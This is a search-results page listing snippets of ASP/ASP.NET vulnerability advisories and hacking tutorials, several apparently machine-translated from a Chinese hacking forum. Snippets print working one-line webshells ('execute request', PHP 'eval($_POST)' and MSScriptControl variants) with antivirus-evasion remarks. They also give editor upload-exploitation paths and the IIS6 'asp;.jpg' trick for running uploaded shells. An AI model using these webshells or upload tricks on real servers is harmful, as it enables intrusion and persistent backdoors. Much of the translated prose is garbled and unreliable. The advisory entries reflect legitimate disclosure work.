223 matches found
DotNetNuke Remote Code Execution vulnerability
======================================= Vulnerability discovered: November 23, 2010 Discovered by: Danil Niggebrugge, Fox-IT BV https://www.fox-it.com/ Reported to vendor: November 30, 2010 Fix available: Yes ======================================= PRODUCT ------------- DotNetNuke is an open sour...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in BugTracker.NET before 3.4.5 allow remote authenticated users to inject arbitrary web script or HTML via 1 the pcd parameter to editbug.aspx, 2 the bugid parameter to editcomment.aspx, 3 the id parameter to edituserpermissions2.aspx, or 4 the...
Microsoft ASP.NET - Auto-Decryptor File Download (MS10-070)
Microsoft ASP.NET - Auto-Decryptor File Download MS10-070 !/usr/bin/ruby -w aspxadchotextattack.rb Copyright c 2010 AmpliaSECURITY. All rights reserved http://www.ampliasecurity.com Agustin Azubel - [email protected] MS10-070 ASPX proof of concept Decrypt data using an auto decryptor...
ASP. Net under the C/S back door--WebAdmin 2. Y application details-vulnerability warning-the black bar safety net
Hello everyone, don't know you have not used even the WebAdmin 2. X? Well, yeah, the one that ASP. Net environment under the back door. That's my immature works, if have what not hand over the place but also hope bear with me. Oh, today?, or let the coupling to the“Huang po sells melon from sell...
eWebEditor . Net versions vulnerability-vulnerability warning-the black bar safety net
Release date: 2010-04-23 Affected versions: ASPX version Vulnerability description: eWebEditorNet is mainly a upload. aspx file there upload vulnerability. Principle: Code form id="post" encType="server" "uploadfile" style="file" size="uploadfile" runat= "lbtnUpload" runat= "JavaScript" Just a...
fckeditor for aspx upload vulnerability-vulnerability warning-the black bar safety net
Appear upload vulnerability in the address is: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/aspx/connector. aspx Open this address you can upload any type of file, the horse is uploaded to the location is:...
Spectrum Software WebManager CMS Xss Vulnerability
Exploit for unknown platform in category web applications ================================================== Spectrum Software WebManager CMS Xss Vulnerability ================================================== .:. Script : Spectrum Software WebManager CMS .:. Info link:...
TopWS SQL Injection
topws .aspx Multiple Sql Injection Vulnerability =================================================================== .:. Author : AtT4CKxT3rR0r1ST .:. Email : [email protected] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : topws .:. Language : aspx .:. Script Download:...
A way to upload aspxshell for the first-class surveillance system-vulnerability warning-the black bar safety net
Publisher:bincker Time:2010-1-24 The best monitoring system of all know what is going on, the main is to upload the data is filtered out, such as varchar, etc. characters. Yesterday the priest said that there is a monitoring system, can not upload the aspx,I tried the following asp the horse is t...
Response eWebEditor vulnerability to upload file 5 0 0 error of the method-vulnerability warning-the black bar safety net
the eval of the word sometimes fail execute the word are basically successful! By:van Attached to:a variety of written sentence method ASP word 1.& lt;%eval request"YouPass"% 2. %executerequest"YouPass"% 3. %executerequest"YouPass"% Free to killmost of the site of the word 4.& lt;% set ms =...
asp. net virtual host path disclosure issue-vulnerability warning-the black bar safety net
Learn asp. net when found,asp. net the site asp. net code for temporary compilationI so understood,could such an argument not a pairput in the WINDOWS\Microsoft. NET\Framework\v1. 1. 4 3 2 2\Temporary ASP.NET Files if you are using 2. 0 of the frameworks,then it is the WINDOWS\Microsoft...
Talk about Ewebeditor editor of each version of the problem-the vulnerability warning-the black bar safety net
Source: Tosec Security Team 'Blog Recently read something about ewebeditor for this editor, with regard to this vulnerability or a lot, in fact a lot of people doingsecurity testingwhen most of the bias in the injection context, sometimes attention under editor aspect is good, there are mainly as...
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1)
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities 1 Abysssec Inc Public Advisory Title : Portili Personal and Team Wiki Multiple Remote Vulnerabilities Affected Version : Portili Personal and Team Wik = 1.14 Vendor Site : www.Portili.com Discovery : www.Abysssec.com Vendor Contact :...
PsTools in the penetration of little application-vulnerability warning-the black bar safety net
Author:zero soulzerosoul Blog: Recent bad luck, take down a network, Server area all not even outside, no rally socks out, cause penetration of the network within other segments of the time very hard. One of the MSSQL and Web are separated, the server although the take down, but sometimes up to...
php version ewebeditor 3.8. vulnerability-vulnerability warning-the black bar safety net
php 版本 后台 是 调用 ../ewebeditor/admin/config.php,we went to look at the source code will know, here I talk about using the method: 1 First of course to find a landing back,默认 是 ../eWebEditor/admin/login.php,into the background after casually enter a user and password,of course,will prompt an error,...
win2003 II6 parsing vulnerability practical and application-vulnerability warning-the black bar safety net
New win2003 IIS6 parsing vulnerability iis6 file parsing vulnerability announced. Use The webshell file name changed 1. asp;. jpg Direct IE access is parsed into ASP That is the asp shell into X. asp;. jpg in win2003 IIS6 environment will automatically resolve to the asp We have to combat it out ...
ASPX Spy (CVE-2008-1436; CVE-2009-0078; CVE-2009-0079; CVE-2009-0080)
ASPX Spy, is an ASPX program that allows easy control over a compromised web server. Using this program, an attacker can upload files through the web browser and execute them. A remote attacker may exploit web application vulnerabilities that will allow him to upload the ASPX Spy tool to a target...
php version ewebeditor 3.8. vulnerability-vulnerability warning-the black bar safety net
php 版本 后台 是 调用 ../ewebeditor/admin/config.php,we went to look at the source code will know, here I talk about using the method: 1 First of course to find a landing back,默认 是 ../eWebEditor/admin/login.php,into the background after casually enter a user and password,of course,will prompt an error,...
ASPX a word of the script the horse detailed analysis-vulnerability warning-the black bar safety net
Source: evil octal First recall before the ASP Word of the classic Trojan! %if request"nonamed""" then execute request"nonamed"% VBS execute is dynamic running the specified code and JSCRIPT also have the eval function can be achieved,that is ASP word the Trojan also has a version is the use of...
The word Trojan is a variety of approach-vulnerability warning-the black bar safety net
asp word %executerequest"1"% php word ? php eval$POST1;?& gt; aspx word script language="C" runat="server" WebAdmin2Y. x. y aaaaa = new WebAdmin2Y. x. y"add6bb58e139be10"; /script Can be escaped ray client figure a word. % set ms = server. CreateObject"MSScriptControl. ScriptControl. 1" ms...